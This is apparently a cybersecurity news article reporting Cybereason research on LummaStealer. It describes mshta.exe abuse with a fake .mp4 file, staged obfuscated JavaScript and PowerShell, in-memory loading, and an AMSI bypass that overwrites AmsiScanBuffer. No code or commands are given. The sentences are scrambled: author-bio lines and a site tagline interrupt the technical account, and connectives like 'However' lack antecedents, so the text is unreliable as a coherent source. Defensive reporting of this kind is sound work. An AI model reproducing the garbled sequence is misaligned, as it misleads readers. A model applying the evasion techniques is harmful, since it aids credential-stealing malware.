Cybereason security researchers identified a new and concerning infection vector where LummaStealer abuses the legitimate mshta.exe Windows utility to execute remote hosted code that masquerades as an .mp4 multimedia file. The initial JavaScript payload contains a variable named “Fygo” with the final version of the second-stage PowerShell payload, which is executed via the ‘eval’ JavaScript function. This assembly is loaded directly into memory using reflection techniques, allowing it to operate without writing files to disk—a method that significantly reduces detection rates by avoiding traditional file-based security controls. According to Cybereason’s research, this variant of LummaStealer is likely distributed through the “Professional” or “Corporate” subscription tiers of the malware service, which offer advanced features like non-resident loaders and enhanced evasion capabilities. Further analysis revealed that this decoded content contains PowerShell commands designed to bypass security controls. This technique, classified as T1218.005 under the MITRE ATT&CK framework, allows attackers to bypass application control solutions and browser security settings since the execution occurs outside the browser’s security context. However, this file actually contains a combination of hexadecimal and obfuscated JavaScript code that the mshta.exe process can open and execute. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. LummaStealer, a sophisticated information-stealing malware distributed as Malware-as-a-Service (MaaS), has evolved with new evasion techniques that abuse legitimate Windows utilities. When executed, the PowerShell script deploys a third stage that contains an AMSI bypass technique targeting the AmsiScanBuffer function. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. This function doesn’t distinguish between JavaScript expressions, variables, or statements, allowing it to execute any code passed to it with the sender’s privileges. When a user opens this disguised MP4 file, the heavily obfuscated JavaScript code initiates a multi-stage infection process. The decrypted final payload includes a significant Base64-encoded .NET assembly that contains the actual LummaStealer malware. Originally observed in 2022 and developed by Russian-speaking adversaries, this malware has demonstrated remarkable agility in evading detection while targeting a wide range of Windows systems. Once users interact with these pages, they are socially engineered into copying and pasting malicious scripts into the Windows Run dialog box, triggering the deployment of the first-stage payload silently in the background. The code searches for the signature “AmsiScanBuffer” in memory regions associated with clr.dll and overwrites it with null bytes, effectively disabling Microsoft’s anti-malware scanning interface. Tushar is a Cyber security content editor with a passion for creating captivating and informative content.
This Cyber News was published on cybersecuritynews.com. Publication date: Thu, 17 Apr 2025 14:30:07 +0000